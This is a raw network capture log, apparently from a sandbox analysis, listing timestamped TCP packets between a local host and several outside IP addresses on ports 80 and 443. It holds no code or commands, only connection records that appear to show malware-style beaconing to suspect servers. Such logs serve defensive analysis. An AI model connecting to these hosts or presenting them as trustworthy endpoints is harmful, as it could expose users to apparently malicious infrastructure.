                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.865273952 CET4992680192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.865468979 CET8049904185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.865657091 CET4990480192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.985090971 CET8049926185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.991977930 CET44349920149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.992038965 CET49920443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.992063999 CET44349920149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.992079973 CET44349920149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.992105007 CET49920443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.992122889 CET49920443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.992697954 CET49920443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.992712021 CET44349920149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:35.207360029 CET8049926185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:35.207516909 CET4992680192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:35.224476099 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:35.228140116 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:35.344525099 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:35.345750093 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:35.347922087 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:35.348186970 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:35.348370075 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:35.468296051 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:35.736335039 CET4993380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:35.856218100 CET8049933185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:35.856416941 CET4993380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:35.856524944 CET4993380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:35.976238012 CET8049933185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675435066 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675463915 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675471067 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675554991 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675595045 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675601959 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675611973 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675617933 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675651073 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675818920 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675825119 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675837994 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.675872087 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.796211004 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.796226978 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.796268940 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.800365925 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.800416946 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.868206024 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.868268967 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.868282080 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.868498087 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.872369051 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.872437954 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.873872995 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.873930931 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.873966932 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.874010086 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.882806063 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.882831097 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.882862091 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.882879972 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.890696049 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.890759945 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.890949965 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.891057014 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.899056911 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.899122000 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.899127960 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.899178028 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.907546043 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.907605886 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.907659054 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.907718897 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.915924072 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.916047096 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.916059017 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.916270971 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.924375057 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.924386024 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.924432993 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.932679892 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.932763100 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.932909966 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.932950974 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.941119909 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.941165924 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.941234112 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.941397905 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.949577093 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.949598074 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.949625015 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.949646950 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.988672018 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.988727093 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.988806009 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:36.988867044 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.060383081 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.060436010 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.060439110 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.060472965 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.061676979 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.061784983 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.061824083 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.066581964 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.066628933 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.066670895 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.070199013 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.070260048 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.070353985 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.070393085 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.075161934 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.075205088 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.075431108 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.075479031 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.079854965 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.079906940 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.079955101 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.079998970 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.084373951 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.084414005 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.084496975 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.084553957 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.088980913 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.089108944 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.089127064 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.089397907 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.093518972 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.093596935 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.093646049 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.093767881 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.098154068 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.098202944 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.098212004 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.098238945 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.102551937 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.102593899 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.102643967 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.102684975 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.107609034 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.107656956 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.107836008 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.107877016 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.111799002 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.111893892 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.111968994 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.116369009 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.116410017 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.116444111 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.116694927 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.120904922 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.120950937 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.121009111 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.121048927 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.124399900 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.124445915 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.124525070 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.124561071 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.127959013 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.128005028 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.128215075 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.128283978 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.132884026 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.132953882 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.132988930 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.133038044 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.135080099 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.135130882 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.135329008 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.135366917 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.138539076 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.138601065 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.138669014 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.138720036 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.141985893 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.142035007 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.142071009 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.142116070 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.185195923 CET8049933185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.185300112 CET8049933185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.185344934 CET4993380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.187593937 CET4993380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.187948942 CET4993880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.252753973 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.252856016 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.252890110 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.252947092 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.254178047 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.254234076 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.254276037 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.254355907 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.257143974 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.257191896 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.257225990 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.257318020 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.260145903 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.260174990 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.260199070 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.260219097 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.262952089 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.263030052 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.263037920 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.263124943 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.265687943 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.265825987 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.265840054 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.265868902 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.268343925 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.268399954 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.268434048 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.268465996 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.271008015 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.271106958 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.271131039 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.271152973 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.273571968 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.273611069 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.273698092 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.273782015 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.276101112 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.276163101 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.276211023 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.276252985 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.278700113 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.278740883 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.278753996 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.278804064 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.281460047 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.281539917 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.281567097 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.281666040 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.283844948 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.283899069 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.283968925 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.284101009 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.286458015 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.286514997 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.286557913 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.286593914 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.289012909 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.289068937 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.289096117 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.289130926 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.291558981 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.291647911 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.291654110 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.291688919 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.294166088 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.294255972 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.294281006 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.294297934 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.296698093 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.296736002 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.296741962 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.296850920 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.299448013 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.299493074 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.299519062 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.299551964 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.301846027 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.301889896 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.301933050 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:37.302002907 CET4993180192.168.2.1031.41.244.11
